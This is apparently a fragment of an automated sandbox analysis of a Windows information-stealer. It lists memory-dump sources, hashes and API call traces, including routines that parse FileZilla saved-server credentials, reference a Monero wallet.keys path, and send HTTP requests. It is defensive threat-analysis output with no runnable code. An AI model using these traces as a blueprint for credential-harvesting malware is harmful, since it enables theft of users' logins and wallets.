                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 603dcc3aacc174a3ee9c1c32c58bb87e96483543e41b69c5094519d0efa1325b
                                • Instruction ID: 54f2345902f80fd3fe3fb5ef437b55040fe006bd75460dcfeaaf784bf2db2928
                                • Opcode Fuzzy Hash: 603dcc3aacc174a3ee9c1c32c58bb87e96483543e41b69c5094519d0efa1325b
                                • Instruction Fuzzy Hash: 9AF1F2F390C200AFD309BF29DC4567ABBE5EF94320F1A892DE6C587744E67558418B87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f156a42bdc0bfa7a884316a458786ba0f773e0af1b481d8574014ff7df72833
                                • Instruction ID: a4331662b84b4702543f41fd0ffa4887db24fe1f2f251b93250d6bb44f28a40f
                                • Opcode Fuzzy Hash: 7f156a42bdc0bfa7a884316a458786ba0f773e0af1b481d8574014ff7df72833
                                • Instruction Fuzzy Hash: 16513AF3B083045BF3089E2AED4577AB7D6DBD4320F16C63DEA8487748F93958064696
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52cf6d7a67774c00cd2821adad06e1551d407828f62677339e25d05af8e7bc18
                                • Instruction ID: 7c49ab0a2d696ff7abe6e4b7bd996ed44cbcfb00e8204164a2325986205e8530
                                • Opcode Fuzzy Hash: 52cf6d7a67774c00cd2821adad06e1551d407828f62677339e25d05af8e7bc18
                                • Instruction Fuzzy Hash: 325181B35BC104FFD3265A24EE8297BB7E9DB80224F15473EE4C2C7786E5B459418292
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e230ef8fcfc74902728a49829ac6fbaf7fa61dd746d73bb5d5d255fc807b4be
                                • Instruction ID: 66caddecd65e553088e060615af034b8a954b73be3a3f72f8b5a9e6a6a047607
                                • Opcode Fuzzy Hash: 9e230ef8fcfc74902728a49829ac6fbaf7fa61dd746d73bb5d5d255fc807b4be
                                • Instruction Fuzzy Hash: 0D5101B3A086145BF304AE6ADC8576BF7D6EFC4720F27863DDA9893344E978580186C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e7e259d74e865731ef8dedb9f3057aedc88d95528333bf4bc17b3b14c1977d8
                                • Instruction ID: 9566f74892cbba4b98c347af5a11a9217b737104a303e409fc81be220ddd5fa6
                                • Opcode Fuzzy Hash: 6e7e259d74e865731ef8dedb9f3057aedc88d95528333bf4bc17b3b14c1977d8
                                • Instruction Fuzzy Hash: DF4104B393C214DFD3086E15DD5357BF7E9EF90710F16882EE2C696600EBB154818A93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a578d1869bb3e86f423de804c2639d17bad437e931b16ad538fe4df2cd7d52a
                                • Instruction ID: 163cc17264469f9f2418f47711be149ba8ef0ca47f95c3f2e30adf3761252343
                                • Opcode Fuzzy Hash: 8a578d1869bb3e86f423de804c2639d17bad437e931b16ad538fe4df2cd7d52a
                                • Instruction Fuzzy Hash: 92418BF3A483046FF344AA3DEC85A7BB7E9EB98310F59853EE4C4C3744E97489058262
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6862dd8a0de288cdde0bb71147655b4769b656634a934073960db0bba20ef98f
                                • Instruction ID: a0f850388f997659a1c37cef04a0e6925e45fd25a75f2526ccfa3c5a27d2b34c
                                • Opcode Fuzzy Hash: 6862dd8a0de288cdde0bb71147655b4769b656634a934073960db0bba20ef98f
                                • Instruction Fuzzy Hash: 8541B1B3A482109BE3407E29DD8576AB7E9EFD4720F1A483DE6C4C7780D67498418B83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01ec1590aecd5e5feeadf9fda3426e83cf572e6fa55dfb96edca9fdefacadc76
                                • Instruction ID: beb327cb6c89f83729d736d4ebcc86d97489809619d68c24ede3eea9c2ee6312
                                • Opcode Fuzzy Hash: 01ec1590aecd5e5feeadf9fda3426e83cf572e6fa55dfb96edca9fdefacadc76
                                • Instruction Fuzzy Hash: 9E41C7F35182049FE3056E38DC85BBBBBE5EB68320F05493DE6C4C3744E63998018656
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00DE0DBA,00DE0DB7,00DE0DB6,00DE0DB3), ref: 00DD0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00DD0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00DD03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00DD0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00DD0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00DD0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00DD0571
                                • lstrcat.KERNEL32(?,url: ), ref: 00DD0580
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD0593
                                • lstrcat.KERNEL32(?,00DE1678), ref: 00DD05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD05B5
                                • lstrcat.KERNEL32(?,00DE167C), ref: 00DD05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00DD05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD05E6
                                • lstrcat.KERNEL32(?,00DE1688), ref: 00DD05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00DD0604
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD0617
                                • lstrcat.KERNEL32(?,00DE1698), ref: 00DD0626
                                • lstrcat.KERNEL32(?,00DE169C), ref: 00DD0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE0DB2), ref: 00DD068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 1d51e20499b8e769943e50874cf976460092c82b5745a6aecfe8d7845c6dc2f9
                                • Instruction ID: bae5b63844cc2583a24ad9a456cd23298c6286fd17206889ec00ea080c4b0a4d
                                • Opcode Fuzzy Hash: 1d51e20499b8e769943e50874cf976460092c82b5745a6aecfe8d7845c6dc2f9
                                • Instruction Fuzzy Hash: A6D13B71A00208ABCB14FBF4DD96EEE7738EF54300F508519F502A7285EE75AA0ADB71
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DC59F8
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0162EA88,00000000,?,0162A4E0,00000000,?,00DE1A1C), ref: 00DC5E71
                                • lstrlen.KERNEL32(00000000), ref: 00DC5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00DC5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC5E9A
                                • lstrlen.KERNEL32(00000000), ref: 00DC5EAF
                                • lstrlen.KERNEL32(00000000), ref: 00DC5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DC5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00DC5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DC5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00DC5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00DC5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00DC5FBD
                                • HttpOpenRequestA.WININET(00000000,0162E9D8,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC5BF8
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00DC5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
